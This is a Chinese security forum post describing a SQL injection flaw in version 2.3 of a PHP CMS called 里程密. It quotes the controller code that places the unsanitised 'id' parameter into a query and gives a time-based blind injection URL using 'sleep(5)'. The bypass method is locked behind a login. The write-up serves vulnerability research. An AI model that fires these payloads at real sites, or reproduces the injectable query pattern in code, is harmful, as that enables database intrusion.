搜索
查看: 1079|回复: 0

里程密最新版V2.3 SQL注入漏洞

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-2-6 16:27:19 | 显示全部楼层 |阅读模式
起因:

“1.关闭DEBUG 不会再报出错误信息 也不会在有sql注入”不再有sql注入,不能忍啊,瞧一瞧!

url:
http://localhost/phpshenji/lichengmi/index.php?m=home&c=category&a=index&id=10
这个前面讲过了,该如何找url所对应的代码
前台(后台)都一样,都有SQL注入。

CategoryController.class.php

class CategoryController extends BaseController {
    public function index(){
        $id = I('get.id');
        $m =M('category');
        $fenleiInfo = $m ->where("id ={$id}")->find();


获取id直接传参,貌似没使用thinkphp框架的防注入措施

那不能怪我了。
加个(闭合
http://localhost/phpshenji/lichengmi/index.php?m=home&c=category&a=index&id=10) and sleep(5) --+


这里只能用时间盲注。

但是用比如 if (ascii(substring(()),1,1)>111,sleep(5),1)都不好使(大家可以试试)

但是可以用以下方法突破




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表